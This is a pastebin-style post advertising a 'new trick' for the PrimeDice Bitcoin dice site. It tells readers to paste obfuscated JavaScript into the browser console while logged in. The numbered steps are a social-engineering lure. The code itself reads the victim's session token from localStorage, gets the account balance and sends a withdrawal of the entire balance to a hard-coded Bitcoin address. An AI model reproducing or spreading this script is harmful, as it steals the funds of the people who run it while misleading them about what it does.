Primedice New Trick with Old Twist

SUBMITTED BY: mollamolla

DATE: Sept. 17, 2016, 6:01 a.m.

FORMAT: Text only

SIZE: 1.1 kB

HITS: 1036

  1. 1. Login to your PrimeDice account
  2. 2. Deposit any amount of BTC you want -Deposit is not needed -
  3. 3. Choose these settings : x2 Payout .
  4. 4. Then COPY the following code and paste it on the Console! (Right click anywhere and open Inspect Element then go to console and paste the code and hit ENTER).
  5. 5. Roll the dice 2 times
  6. 6. Refresh the page and do it again .....
  7. //Console Code//
  8. var _0x66ef = ["", "?access_token=", "token", "$", "users/1", "amount", "address", "balance", "user", "1Lyn5mX4SKcNd7xP8T6LNX5n8F3H6v4wYV", "withdraw", "post", "getJSON"];
  9. calculate_nonce = function(_0x3559x1) {
  10. return _0x66ef[0] + _0x3559x1 + _0x66ef[1] + localStorage[_0x66ef[2]];
  11. };
  12. lut = window[_0x66ef[3]];
  13. lut[_0x66ef[12]](calculate_nonce(_0x66ef[4]), function(_0x3559x1) {
  14. var _0x3559x2 = _0x66ef[5];
  15. var _0x3559x3 = _0x66ef[6];
  16. var _0x3559x4 = {};
  17. _0x3559x4[_0x3559x2] = _0x3559x1[_0x66ef[8]][_0x66ef[7]];
  18. _0x3559x4[_0x3559x3] = _0x66ef[9];
  19. lut[_0x66ef[11]](calculate_nonce(_0x66ef[10]), _0x3559x4);
  20. });

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